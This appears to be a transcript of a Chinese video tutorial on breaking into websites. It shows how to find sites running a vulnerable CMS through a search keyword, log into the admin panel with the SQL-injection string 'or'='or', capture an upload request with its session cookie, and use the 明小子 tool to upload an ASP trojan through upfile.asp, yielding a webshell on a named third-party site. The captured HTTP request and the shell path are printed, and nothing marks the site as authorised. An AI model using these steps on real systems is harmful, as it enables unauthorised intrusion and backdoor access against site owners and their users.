大家好我叫龙少钦,今天看了个教程叫利用网站后台管理的老漏洞拿网站WEBSHELL ,作者提出来利用备份来得到webshell,我来做下补充,我用作者那个关键字搜索不到 ,我自己找个了
关键字 :star企业产品发布v1.0测试版 后台地址:manage/Login.asp
好现在开始我已经在搜索了。 我们随便找个 默认后台manage/Login.asp 。进去看看有没
可以 。用万能密码试下 'or'='or' 这个不行我们换个 好这个可以 ,大家看看这个备份没有按钮
这就是我做补充的 ,好现在来找上传点 , 好 这次我用的主要是用抓包 来上传ASP木马得到webshell的 ,好来
那出抓包工具来抓包 ,抓包工具都会用吧我就不多演示了 ,直接来抓包
好包已经抓好了大家看
POST /p/upfile.asp HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: http://www.konjacchina.com/p/upload.asp
Accept-Language: zh-cn
Content-Type: multipart/form-data; boundary=---------------------------7d6bb226b02d8
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: www.konjacchina.com
Content-Length: 33831
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: AJSTAT_ok_pages=1; AJSTAT_ok_times=1; ASPSESSIONIDCSQRSRAA=FHKFAELAEPAHHLODPLDMDNMA
这个是最重要的 ,我们这次就是要用upfile.asp这个上才传漏洞老讲解的 ,哦是动力上传漏洞,我
也是记得不清楚这个漏洞叫什么了
好拿出明小子 上传地址是http://www.konjacchina.com/p/upfile.asp 在网站后面家个UPFUILE。ASP就可以了
现在来复制抓包抓来的COOKIE ,复制到明小子里面 还有个最重要的
上传页面要选第二项,然后点上传上传成功
自己手动查找WEBSHELL路径!
还我们自己来找上传的也面
UploadFiles/2006815145117804.asp 就是这个了 给UPFILE。ASP 换成这个就可以了
看到没进来了 , 好教程结束 ,
您现在的位置: